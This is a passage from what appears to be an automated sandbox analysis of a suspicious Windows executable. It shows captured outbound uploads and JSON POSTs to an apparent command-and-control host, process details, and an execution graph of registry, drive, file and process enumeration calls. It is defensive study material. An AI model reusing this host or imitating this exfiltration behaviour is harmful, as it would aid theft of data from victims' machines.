                                                    Dec 19, 2024 08:33:32.360271931 CET4944OUTData Raw: 57 55 71 4e 66 46 59 6e 44 31 63 58 53 74 68 59 5c 2f 57 5a 30 35 34 5a 78 71 50 39 6e 38 4d 65 44 5c 2f 41 4b 52 76 41 57 65 59 66 6a 48 77 35 34 65 7a 50 4a 73 38 5c 2f 73 66 42 56 63 4a 6a 61 75 47 34 5a 78 4e 57 76 6b 76 46 63 38 4e 67 38 76
                                                    Data Ascii: WUqNfFYnD1cXSthY\/WZ054ZxqP9n8MeD\/AKRvAWeYfjHw54ezPJs8\/sfBVcJjauG4ZxNWvkvFc8Ng8vxOFy3iJYqji8LmuIxGGwWGxVHBVv8AbprBwq08Wp0l+pJ\/4LX\/ALRP8Pws+B4+unfEA\/y8frUZ\/wCC137R38Pwv+BY+uk\/EM\/y+Iq1+J0Ovy33hrxprmnacNQ1r4feKPCvhPxV8O7OW\/uviLaX\/izxfJ8
                                                    Dec 19, 2024 08:33:32.360320091 CET2472OUTData Raw: 72 6e 76 2b 76 58 38 71 72 4e 73 6a 78 73 2b 35 5c 2f 6e 5c 2f 50 31 34 39 36 44 55 70 6a 66 35 66 33 2b 33 37 33 7a 4d 2b 76 38 41 6e 5c 2f 49 70 6e 79 62 58 54 37 69 65 56 30 35 38 5c 2f 73 65 65 50 5c 2f 72 2b 68 70 5c 2f 6c 76 48 5c 2f 71 30
                                                    Data Ascii: rnv+vX8qrNsjxs+5\/n\/P1496DUpjf5f3+373zM+v8An\/IpnybXT7ieV058\/seeP\/r+hp\/lvH\/q0jf\/AI+P3nr+n50fP8nyCRI4v9Z6Y\/p\/nrQdAwN0\/vn\/AJaR\/wDPD8\/5574xmq8qPH8myTHlfn\/n6fpVjd5mxE5\/dfn7\/wCe34Uz51jmfZcbv+uv+u5\/z+dB0FMI\/Hz\/AGZP8\/6V9fpippVeSR9i
                                                    Dec 19, 2024 08:33:32.360332012 CET2472OUTData Raw: 52 71 55 66 34 33 38 42 76 70 4d 35 70 34 47 35 42 78 50 77 37 68 4f 47 63 74 7a 5c 2f 42 63 56 34 36 6e 69 4d 78 6c 6a 61 31 65 6a 56 6a 68 58 6b 2b 59 5a 4c 69 63 48 53 39 6e 4c 32 62 70 34 6a 44 5a 6a 56 71 50 32 31 4f 71 71 65 4a 6f 34 58 45
                                                    Data Ascii: RqUf438BvpM5p4G5BxPw7hOGctz\/BcV46niMxlja1ejVjhXk+YZLicHS9nL2bp4jDZjVqP21OqqeJo4XEU1Cth6c1g+P\/2s\/iL4p+Kdzr+sftK\/s46b4i134OfHPwD+zj+2H8F9M\/4KbeL9f\/Z\/8W678S\/hj410HWfi6v7X6fFT48eA4vGHw18N\/EX4X+Dpf2aH+IFr8Dda+Kfia+0bSl0nUb7Wz5\/4l\/aD+IPhf
                                                    Dec 19, 2024 08:33:32.360441923 CET4944OUTData Raw: 4d 46 4c 69 62 4f 36 75 43 77 6d 57 63 48 35 5a 57 77 31 57 4e 4c 6c 78 6c 4c 67 36 70 6d 31 54 42 2b 32 6e 52 6a 52 6e 43 47 4f 6a 6d 2b 49 6f 5a 6e 51 77 73 73 4e 68 38 62 51 69 6f 7a 6f 78 71 31 38 58 58 78 48 39 70 55 5c 2f 32 6b 76 69 46 54
                                                    Data Ascii: MFLibO6uCwmWcH5ZWw1WNLlxlLg6pm1TB+2nRjRnCGOjm+IoZnQwssNh8bQiozoxq18XXxH9pU\/2kviFTnWrR4PyGGInV4m9hWp1sTF0MLxIsFKWEdKTnRxEcuxeDeY5fWxcK+JoY+VKcq9XD4XCYXD\/I+gan8P8ASf2k\/iZ8dlubmx+DVv4L\/aR\/Z++C2t33g7xJHqZ+EOi\/sV\/ED9lb9mqGfwzY6TqPiHRZfFNhafD
                                                    Dec 19, 2024 08:33:32.401257038 CET27192OUTData Raw: 39 44 44 68 44 48 5a 48 69 73 71 77 4f 66 35 68 6c 6d 4c 7a 53 58 45 73 73 33 7a 65 6c 68 63 46 56 78 75 4a 5c 2f 77 42 5a 63 56 6a 4d 52 58 70 59 57 55 36 46 38 74 6f 59 61 6e 6a 38 58 68 36 64 48 41 54 77 38 63 56 53 78 57 4c 68 6d 61 7a 43 47
                                                    Data Ascii: 9DDhDHZHisqwOf5hlmLzSXEss3zelhcFVxuJ\/wBZcVjMRXpYWU6F8toYanj8Xh6dHATw8cVSxWLhmazCGKxEKn9WZH+0B48y3PaWa5lw5luc4DL8FkuBybJK+MzCjgMDHKcmweUVMZXp0cTGnmWYY5ZfgsTVxOYUsSsLXwOXyyynl\/1DDKn82eEvFn7KMnh7Svg3B4Y\/aHm8CWn7Bs37Gdx+0ufibcQ\/BOH4g+JY5f2gr\/
                                                    Dec 19, 2024 08:33:32.521186113 CET9888OUTData Raw: 47 59 63 44 38 5a 59 47 74 4b 44 74 4e 55 73 58 6c 39 50 44 31 48 42 32 64 70 71 46 53 58 4b 37 4f 30 72 4e 6f 39 54 5c 2f 5a 76 30 69 32 5c 2f 62 45 5c 2f 34 4a 43 36 52 38 49 76 68 37 72 6c 72 70 48 69 69 35 2b 43 64 5c 2f 38 46 62 7a 37 62 63
                                                    Data Ascii: GYcD8ZYGtKDtNUsXl9PD1HB2dpqFSXK7O0rNo9T\/Zv0i2\/bE\/4JC6R8Ivh7rlrpHii5+Cd\/8Fbz7bcSINC8f+Bo003+yfEPkRvcafZ6ybHS725UW8txH4b8Q290ILjzVjk\/Mj4efse\/tq\/FTUv2S\/gB4y\/ZP8H\/AAN8Nfsx+Podf8VfHuCLRbbVPE2k2ev2ur3cz6tp2p3R8Sahdx2hFvDosmpR6trkljqV7caLYw
                                                    Dec 19, 2024 08:33:32.565958023 CET1236OUTData Raw: 6d 6e 33 31 70 65 72 71 4a 74 62 69 47 56 39 36 2b 64 35 4e 53 70 30 63 52 56 7a 62 4c 4b 64 44 45 52 71 53 6f 56 71 6d 50 77 73 4b 56 65 4e 4b 5c 2f 74 58 52 71 53 71 71 46 52 55 76 2b 58 6a 68 4b 53 68 39 71 78 78 34 62 68 33 69 48 45 56 38 52
                                                    Data Ascii: mn31perqJtbiGV96+d5NSp0cRVzbLKdDERqSoVqmPwsKVeNK\/tXRqSqqFRUv+XjhKSh9qxx4bh3iHEV8RhaGRZzWxOGVCWIw9LK8bUr0FieX6s61GFB1KSxHtIewc4xVXnh7Pm5leOv1Q\/wCCcf7Z\/wAI\/wBk7R\/i3Z\/E6y8b303jrUvBdzoy+DdF0vVvIj8N2viaK+OonVfEGgJB57a5ai0Fu92z+RdeetuFgM\/5g6V
                                                    Dec 19, 2024 08:33:32.685060978 CET2472OUTData Raw: 38 48 65 43 5c 2f 48 33 6a 48 77 42 34 4c 6a 76 70 76 47 58 6a 72 77 68 34 41 38 61 65 4b 66 42 76 68 47 4c 54 4e 50 58 56 74 52 6b 38 55 65 4b 4e 41 30 4c 55 64 44 38 50 4c 59 61 55 36 61 6e 65 6e 56 37 2b 7a 2b 79 36 63 79 33 73 32 79 32 49 6c
                                                    Data Ascii: 8HeC\/H3jHwB4LjvpvGXjrwh4A8aeKfBvhGLTNPXVtRk8UeKNA0LUdD8PLYaU6anenV7+z+y6cy3s2y2Ilr7\/wAN\/Arwf8KM\/occ5HxvmeJrU8vxOEp1M84k4XrZTLDZlNYV1efB5PlspSlWoyo0JxxaputGdPlnKLivy7xc+kx4+eOPDGI8NOJPDjJsJRrZphMbVo8N8IcaUM+hi8pgsbGgqePz7N4RjGhXhiMTTlgHVWHq
                                                    Dec 19, 2024 08:33:33.450408936 CET212INHTTP/1.0 503 Service Unavailable
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.949738194.87.47.113805960C:\Users\user\Desktop\wlEp68Few5.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 19, 2024 08:33:34.301673889 CET287OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 143
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                    Dec 19, 2024 08:33:35.626431942 CET212INHTTP/1.0 503 Service Unavailable
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.94972198.85.100.804435960C:\Users\user\Desktop\wlEp68Few5.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-19 07:33:30 UTC52OUTGET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-19 07:33:30 UTC224INHTTP/1.1 200 OK
                                                    Date: Thu, 19 Dec 2024 07:33:30 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-19 07:33:30 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:02:33:24
                                                    Start date:19/12/2024
                                                    Path:C:\Users\user\Desktop\wlEp68Few5.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\wlEp68Few5.exe"
                                                    Imagebase:0x470000
                                                    File size:4'474'880 bytes
                                                    MD5 hash:8CD346FC831E7D59EBAB0DE045018B84
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:4.1%
                                                      Dynamic/Decrypted Code Coverage:43.7%
                                                      Signature Coverage:9.9%
                                                      Total number of Nodes:513
                                                      Total number of Limit Nodes:50
                                                      execution_graph 87258 48d5e0 87259 48d652 WSAStartup 87258->87259 87260 48d5f0 87258->87260 87259->87260 86793 4ab400 86794 4ab40b 86793->86794 86795 4ab425 86793->86795 86798 477770 86794->86798 86796 4ab421 86799 4777b6 recv 86798->86799 86800 477790 86798->86800 86801 477799 86799->86801 86800->86799 86800->86801 86801->86796 86802 4ae400 86803 4ae412 86802->86803 86805 4ae459 86802->86805 86806 4a68b0 socket ioctlsocket connect getsockname closesocket 86803->86806 86806->86805 86807 4ab3c0 86808 4ab3cb 86807->86808 86809 4ab3ee 86807->86809 86813 4776a0 86808->86813 86817 4a9290 86808->86817 86810 4ab3ea 86814 4776e6 send 86813->86814 86815 4776c0 86813->86815 86816 4776c9 86814->86816 86815->86814 86815->86816 86816->86810 86818 4776a0 send 86817->86818 86819 4a92e5 86818->86819 86820 4a9392 86819->86820 86821 4a9335 WSAIoctl 86819->86821 86820->86810 86821->86820 86822 4a9366 86821->86822 86822->86820 86823 4a9371 setsockopt 86822->86823 86823->86820 86824 4713c9 86827 471160 86824->86827 86826 4713a1 86827->86826 86828 7f8a20 isxdigit 86827->86828 86828->86827 86829 472f17 86836 472f2c 86829->86836 86830 4731d3 86831 472fb3 RegOpenKeyExA 86831->86836 86832 47315c RegEnumKeyExA 86832->86836 86833 473046 RegOpenKeyExA 86834 473089 RegQueryValueExA 86833->86834 86833->86836 86835 47313b RegCloseKey 86834->86835 86834->86836 86835->86836 86836->86830 86836->86831 86836->86832 86836->86833 86836->86835 86837 4731d7 86840 4731f4 86837->86840 86838 473200 86839 4732dc CloseHandle 86839->86838 86840->86838 86840->86839 87261 481139 87262 481148 87261->87262 87264 481527 87262->87264 87266 480f69 87262->87266 87269 47fec0 6 API calls 87262->87269 87264->87266 87270 4822d0 6 API calls 87264->87270 87267 480f00 87266->87267 87271 4ad4d0 socket ioctlsocket connect getsockname closesocket 87266->87271 87269->87264 87270->87266 87271->87267 86841 523c00 86842 523c23 86841->86842 86844 523c0d 86841->86844 86842->86844 86845 53b180 86842->86845 86848 53b19b 86845->86848 86852 53b2e3 86845->86852 86849 53b2a9 getsockname 86848->86849 86851 53b020 closesocket 86848->86851 86848->86852 86853 53af30 86848->86853 86857 53b060 86848->86857 86862 53b020 86849->86862 86851->86848 86852->86844 86854 53af63 socket 86853->86854 86855 53af4c 86853->86855 86854->86848 86855->86854 86856 53af52 86855->86856 86856->86848 86860 53b080 86857->86860 86858 53b0b0 connect 86859 53b0bf WSAGetLastError 86858->86859 86859->86860 86861 53b0ea 86859->86861 86860->86858 86860->86859 86860->86861 86861->86848 86863 53b052 86862->86863 86864 53b029 86862->86864 86863->86848 86865 53b04b closesocket 86864->86865 86866 53b03e 86864->86866 86865->86863 86866->86848 87272 524720 87276 524728 87272->87276 87273 524733 87275 524774 87276->87273 87283 52476c 87276->87283 87288 525540 socket ioctlsocket connect getsockname closesocket 87276->87288 87278 52482e 87278->87283 87289 529270 87278->87289 87280 524860 87294 524950 87280->87294 87282 524878 87283->87282 87284 5230a0 87283->87284 87285 5230b0 87284->87285 87287 5231bc 87284->87287 87285->87287 87300 523320 87285->87300 87287->87275 87288->87278 87305 52a440 87289->87305 87291 529297 87293 5292ab 87291->87293 87339 52bbe0 socket ioctlsocket connect getsockname closesocket 87291->87339 87293->87280 87295 524966 87294->87295 87297 5249c5 87295->87297 87299 5249b9 87295->87299 87340 52bbe0 socket ioctlsocket connect getsockname closesocket 87295->87340 87296 524aa0 gethostname 87296->87297 87296->87299 87297->87283 87299->87296 87299->87297 87302 523332 87300->87302 87301 5233a9 87301->87287 87302->87301 87304 539440 socket ioctlsocket connect getsockname closesocket 87302->87304 87304->87302 87306 52a46b 87305->87306 87308 52a48b GetAdaptersAddresses 87306->87308 87337 52a4db 87306->87337 87307 52aa03 RegOpenKeyExA 87309 52ab70 RegOpenKeyExA 87307->87309 87310 52aa27 RegQueryValueExA 87307->87310 87324 52a4a6 87308->87324 87308->87337 87313 52ab90 87309->87313 87314 52ac34 RegOpenKeyExA 87309->87314 87311 52aa71 87310->87311 87312 52aacc RegQueryValueExA 87310->87312 87311->87312 87322 52aa85 RegQueryValueExA 87311->87322 87315 52ab66 RegCloseKey 87312->87315 87316 52ab0e 87312->87316 87313->87314 87317 52acf8 RegOpenKeyExA 87314->87317 87336 52ac54 87314->87336 87315->87309 87316->87315 87325 52ab1e RegQueryValueExA 87316->87325 87319 52ad56 RegEnumKeyExA 87317->87319 87320 52ad14 87317->87320 87318 52a4f3 GetAdaptersAddresses 87332 52a505 87318->87332 87318->87337 87319->87320 87321 52ad9b 87319->87321 87320->87291 87323 52ae16 RegOpenKeyExA 87321->87323 87329 52aab3 87322->87329 87326 52ae34 RegQueryValueExA 87323->87326 87327 52addf RegEnumKeyExA 87323->87327 87324->87318 87324->87337 87331 52ab4c 87325->87331 87330 52af43 RegQueryValueExA 87326->87330 87338 52adaa 87326->87338 87327->87320 87327->87323 87328 52a527 GetAdaptersAddresses 87328->87337 87329->87312 87333 52b052 RegQueryValueExA 87330->87333 87330->87338 87331->87315 87332->87328 87332->87337 87334 52adc7 RegCloseKey 87333->87334 87333->87338 87334->87327 87335 52afa0 RegQueryValueExA 87335->87338 87336->87317 87337->87307 87337->87320 87338->87330 87338->87333 87338->87334 87338->87335 87339->87293 87340->87299 86867 53a080 86870 539740 86867->86870 86869 53a09b 86871 539780 86870->86871 86875 53975d 86870->86875 86872 539925 RegOpenKeyExA 86871->86872 86871->86875 86873 53995a RegQueryValueExA 86872->86873 86872->86875 86874 539986 RegCloseKey 86873->86874 86874->86875 86875->86869 87341 7150520 87342 71504c8 Process32FirstW Process32FirstW 87341->87342 87344 715059f 87342->87344 87345 4729ff FindFirstFileA 87346 472a31 87345->87346 87347 472a5c RegOpenKeyExA 87346->87347 87348 472a93 87347->87348 87349 472ade CharUpperA 87348->87349 87350 472b0a 87349->87350 87351 472bf9 QueryFullProcessImageNameA 87350->87351 87352 472c3b CloseHandle 87351->87352 87354 472c64 87352->87354 87353 472df1 CloseHandle 87355 472e23 87353->87355 87354->87353 86876 473d5e 86881 473d30 86876->86881 86877 473d90 86885 47fcb0 6 API calls 86877->86885 86880 473dc1 86881->86876 86881->86877 86882 480ab0 86881->86882 86886 4805b0 86882->86886 86884 480acd 86884->86881 86885->86880 86887 4805bd 86886->86887 86889 4807c7 86886->86889 86888 480707 WSAEventSelect 86887->86888 86887->86889 86890 4807ef 86887->86890 86892 4776a0 send 86887->86892 86888->86887 86888->86889 86889->86884 86890->86889 86895 480847 86890->86895 86896 486fa0 86890->86896 86892->86887 86893 4809e8 WSAEnumNetworkEvents 86894 4809d0 WSAEventSelect 86893->86894 86893->86895 86894->86893 86894->86895 86895->86889 86895->86893 86895->86894 86898 486fd4 86896->86898 86899 486feb 86896->86899 86897 487207 select 86897->86899 86898->86897 86898->86899 86899->86895 86900 47255d 86950 7f9f70 86900->86950 86903 472589 86904 4725a0 GlobalMemoryStatusEx 86903->86904 86905 4725ec 86904->86905 86952 710098c 86905->86952 86960 7100a2d 86905->86960 86968 7100aef 86905->86968 86976 7100ba5 86905->86976 86984 7100928 86905->86984 86992 71009e3 86905->86992 87000 7100c25 86905->87000 87006 7100aa1 86905->87006 87014 7100b22 86905->87014 87022 7100a7a 86905->87022 87030 7100cbc 86905->87030 87034 7100c37 86905->87034 87040 7100ab9 86905->87040 87048 7100c71 86905->87048 87054 7100932 86905->87054 87062 7100b70 86905->87062 87070 7100970 86905->87070 87078 7100d0c 86905->87078 87082 710099b 86905->87082 87090 7100a07 86905->87090 87098 710094b 86905->87098 87107 7100c85 86905->87107 87113 7100b47 86905->87113 87121 7100cc2 86905->87121 87125 7100b03 86905->87125 87133 7100a5d 86905->87133 87142 7100a41 86905->87142 87150 7100a15 86905->87150 87158 7100b5d 86905->87158 87166 7100956 86905->87166 87174 7100cda 86905->87174 87178 71009d3 86905->87178 87186 7100bd2 86905->87186 87192 7100a90 86905->87192 87200 7100b90 86905->87200 86906 47263c GetDriveTypeA 86908 472655 GetDiskFreeSpaceExA 86906->86908 86910 47261b 86906->86910 86907 472762 86909 4727d6 KiUserCallbackDispatcher 86907->86909 86908->86910 86911 4727f8 86909->86911 86910->86906 86910->86907 86912 4728d9 FindFirstFileW 86911->86912 86913 472906 FindNextFileW 86912->86913 86914 472928 86912->86914 86913->86913 86913->86914 86951 47256c GetSystemInfo 86950->86951 86951->86903 86953 71009a1 86952->86953 86954 7100bd2 2 API calls 86953->86954 86955 7100bcf 86953->86955 86954->86953 86956 7100cbc GetLogicalDrives 86955->86956 86957 7100ca9 GetLogicalDrives 86956->86957 86959 7100d35 86957->86959 86962 7100a53 86960->86962 86961 7100bd2 2 API calls 86961->86962 86962->86961 86963 7100bcf 86962->86963 86964 7100cbc GetLogicalDrives 86963->86964 86965 7100ca9 GetLogicalDrives 86964->86965 86967 7100d35 86965->86967 86970 7100ad7 86968->86970 86969 7100bd2 2 API calls 86969->86970 86970->86969 86971 7100bcf 86970->86971 86972 7100cbc GetLogicalDrives 86971->86972 86973 7100ca9 GetLogicalDrives 86972->86973 86975 7100d35 86973->86975 86978 7100b45 86976->86978 86977 7100bd2 2 API calls 86977->86978 86978->86977 86979 7100bcf 86978->86979 86980 7100cbc GetLogicalDrives 86979->86980 86981 7100ca9 GetLogicalDrives 86980->86981 86983 7100d35 86981->86983 86986 7100940 86984->86986 86985 7100bd2 2 API calls 86985->86986 86986->86985 86987 7100bcf 86986->86987 86988 7100cbc GetLogicalDrives 86987->86988 86989 7100ca9 GetLogicalDrives 86988->86989 86991 7100d35 86989->86991 86994 7100a0f 86992->86994 86993 7100bd2 2 API calls 86993->86994 86994->86993 86995 7100bcf 86994->86995 86996 7100cbc GetLogicalDrives 86995->86996 86997 7100ca9 GetLogicalDrives 86996->86997 86999 7100d35 86997->86999 87001 7100c29 87000->87001 87002 7100cbc GetLogicalDrives 87001->87002 87003 7100ca9 GetLogicalDrives 87002->87003 87005 7100d35 87003->87005 87008 7100a69 87006->87008 87007 7100bd2 2 API calls 87007->87008 87008->87007 87009 7100bcf 87008->87009 87010 7100cbc GetLogicalDrives 87009->87010 87011 7100ca9 GetLogicalDrives 87010->87011 87013 7100d35 87011->87013 87016 7100b39 87014->87016 87015 7100bd2 2 API calls 87015->87016 87016->87015 87017 7100bcf 87016->87017 87018 7100cbc GetLogicalDrives 87017->87018 87019 7100ca9 GetLogicalDrives 87018->87019 87021 7100d35 87019->87021 87024 7100a1a 87022->87024 87023 7100bd2 2 API calls 87023->87024 87024->87023 87025 7100bcf 87024->87025 87026 7100cbc GetLogicalDrives 87025->87026 87027 7100ca9 GetLogicalDrives 87026->87027 87029 7100d35 87027->87029 87031 7100ccf GetLogicalDrives 87030->87031 87033 7100d35 87031->87033 87035 7100c3f 87034->87035 87036 7100cbc GetLogicalDrives 87035->87036 87037 7100ca9 GetLogicalDrives 87036->87037 87039 7100d35 87037->87039 87042 7100ac3 87040->87042 87041 7100bd2 2 API calls 87041->87042 87042->87041 87043 7100bcf 87042->87043 87044 7100cbc GetLogicalDrives 87043->87044 87045 7100ca9 GetLogicalDrives 87044->87045 87047 7100d35 87045->87047 87049 7100c92 87048->87049 87050 7100cbc GetLogicalDrives 87049->87050 87051 7100ca9 GetLogicalDrives 87050->87051 87053 7100d35 87051->87053 87056 7100936 87054->87056 87055 7100bd2 2 API calls 87055->87056 87056->87055 87057 7100bcf 87056->87057 87058 7100cbc GetLogicalDrives 87057->87058 87059 7100ca9 GetLogicalDrives 87058->87059 87061 7100d35 87059->87061 87064 7100b73 87062->87064 87063 7100bd2 2 API calls 87063->87064 87064->87063 87065 7100bcf 87064->87065 87066 7100cbc GetLogicalDrives 87065->87066 87067 7100ca9 GetLogicalDrives 87066->87067 87069 7100d35 87067->87069 87072 7100936 87070->87072 87071 7100bd2 2 API calls 87071->87072 87072->87071 87073 7100bcf 87072->87073 87074 7100cbc GetLogicalDrives 87073->87074 87075 7100ca9 GetLogicalDrives 87074->87075 87077 7100d35 87075->87077 87079 7100ccd GetLogicalDrives 87078->87079 87081 7100d35 87079->87081 87084 71009d7 87082->87084 87083 7100bd2 2 API calls 87083->87084 87084->87083 87085 7100bcf 87084->87085 87086 7100cbc GetLogicalDrives 87085->87086 87087 7100ca9 GetLogicalDrives 87086->87087 87089 7100d35 87087->87089 87092 7100a0f 87090->87092 87091 7100bd2 2 API calls 87091->87092 87092->87091 87093 7100bcf 87092->87093 87094 7100cbc GetLogicalDrives 87093->87094 87095 7100ca9 GetLogicalDrives 87094->87095 87097 7100d35 87095->87097 87099 71008eb 87098->87099 87101 710094e 87098->87101 87100 7100bd2 2 API calls 87100->87101 87101->87100 87102 7100bcf 87101->87102 87103 7100cbc GetLogicalDrives 87102->87103 87104 7100ca9 GetLogicalDrives 87103->87104 87106 7100d35 87104->87106 87108 7100ca3 87107->87108 87109 7100cbc GetLogicalDrives 87108->87109 87110 7100ca9 GetLogicalDrives 87109->87110 87112 7100d35 87110->87112 87115 7100b55 87113->87115 87114 7100bd2 2 API calls 87114->87115 87115->87114 87116 7100bcf 87115->87116 87117 7100cbc GetLogicalDrives 87116->87117 87118 7100ca9 GetLogicalDrives 87117->87118 87120 7100d35 87118->87120 87122 7100ccd GetLogicalDrives 87121->87122 87124 7100d35 87122->87124 87127 7100b06 87125->87127 87126 7100bd2 2 API calls 87126->87127 87127->87126 87128 7100bcf 87127->87128 87129 7100cbc GetLogicalDrives 87128->87129 87130 7100ca9 GetLogicalDrives 87129->87130 87132 7100d35 87130->87132 87136 7100a60 87133->87136 87134 71009fa 87134->86910 87135 7100bd2 2 API calls 87135->87136 87136->87134 87136->87135 87137 7100bcf 87136->87137 87138 7100cbc GetLogicalDrives 87137->87138 87139 7100ca9 GetLogicalDrives 87138->87139 87141 7100d35 87139->87141 87144 7100a49 87142->87144 87143 7100bd2 2 API calls 87143->87144 87144->87143 87145 7100bcf 87144->87145 87146 7100cbc GetLogicalDrives 87145->87146 87147 7100ca9 GetLogicalDrives 87146->87147 87149 7100d35 87147->87149 87152 7100a32 87150->87152 87151 7100bd2 2 API calls 87151->87152 87152->87151 87153 7100bcf 87152->87153 87154 7100cbc GetLogicalDrives 87153->87154 87155 7100ca9 GetLogicalDrives 87154->87155 87157 7100d35 87155->87157 87160 7100b62 87158->87160 87159 7100bd2 2 API calls 87159->87160 87160->87159 87161 7100bcf 87160->87161 87162 7100cbc GetLogicalDrives 87161->87162 87163 7100ca9 GetLogicalDrives 87162->87163 87165 7100d35 87163->87165 87167 7100969 87166->87167 87168 7100bd2 2 API calls 87167->87168 87169 7100bcf 87167->87169 87168->87167 87170 7100cbc GetLogicalDrives 87169->87170 87171 7100ca9 GetLogicalDrives 87170->87171 87173 7100d35 87171->87173 87175 7100cdd GetLogicalDrives 87174->87175 87177 7100d35 87175->87177 87180 71009d7 87178->87180 87179 7100bd2 2 API calls 87179->87180 87180->87179 87181 7100bcf 87180->87181 87182 7100cbc GetLogicalDrives 87181->87182 87183 7100ca9 GetLogicalDrives 87182->87183 87185 7100d35 87183->87185 87187 7100be4 87186->87187 87188 7100cbc GetLogicalDrives 87187->87188 87189 7100ca9 GetLogicalDrives 87188->87189 87191 7100d35 87189->87191 87194 7100ab0 87192->87194 87193 7100bd2 2 API calls 87193->87194 87194->87193 87195 7100bcf 87194->87195 87196 7100cbc GetLogicalDrives 87195->87196 87197 7100ca9 GetLogicalDrives 87196->87197 87199 7100d35 87197->87199 87202 7100b8d 87200->87202 87201 7100bd2 2 API calls 87201->87202 87202->87201 87203 7100bcf 87202->87203 87204 7100cbc GetLogicalDrives 87203->87204 87205 7100ca9 GetLogicalDrives 87204->87205 87207 7100d35 87205->87207 87208 4a8b50 87209 4a8b6b 87208->87209 87227 4a8bb5 87208->87227 87210 4a8b8f 87209->87210 87211 4a8bf3 87209->87211 87209->87227 87247 486e40 select 87210->87247 87228 4aa550 87211->87228 87214 4a8bfc 87218 4a8c1f connect 87214->87218 87222 4a8c35 87214->87222 87226 4a8cb2 87214->87226 87214->87227 87215 4a8ba1 87216 4a8cd9 SleepEx getsockopt 87215->87216 87215->87226 87215->87227 87219 4a8d18 87216->87219 87217 4aa150 getsockname 87225 4a8dff 87217->87225 87218->87222 87221 4a8d43 87219->87221 87219->87226 87224 4aa150 getsockname 87221->87224 87243 4aa150 87222->87243 87224->87227 87225->87227 87248 4778b0 closesocket 87225->87248 87226->87217 87226->87225 87226->87227 87229 4aa575 87228->87229 87232 4aa597 87229->87232 87250 4775e0 87229->87250 87231 4778b0 closesocket 87234 4aa713 87231->87234 87233 4aa811 setsockopt 87232->87233 87239 4aa83b 87232->87239 87241 4aa69b 87232->87241 87233->87239 87234->87214 87236 4aaf56 87237 4aaf5d 87236->87237 87236->87241 87237->87234 87238 4aa150 getsockname 87237->87238 87238->87234 87239->87241 87242 4aabe1 87239->87242 87256 4a6be0 8 API calls 87239->87256 87241->87231 87241->87234 87242->87241 87255 4d67e0 ioctlsocket 87242->87255 87244 4aa15f 87243->87244 87246 4aa1d0 87243->87246 87245 4aa181 getsockname 87244->87245 87244->87246 87245->87246 87246->87215 87247->87215 87249 4778c5 87248->87249 87249->87227 87251 477607 socket 87250->87251 87252 4775ef 87250->87252 87253 47762b 87251->87253 87252->87251 87254 477643 87252->87254 87253->87232 87254->87232 87255->87236 87256->87242 87356 8ad270 87358 8ad29a 87356->87358 87357 8ad2a6 87358->87357 87361 8012a0 87358->87361 87360 8ad2da 87362 8012ac 87361->87362 87365 7fe030 87362->87365 87364 8012da 87364->87360 87368 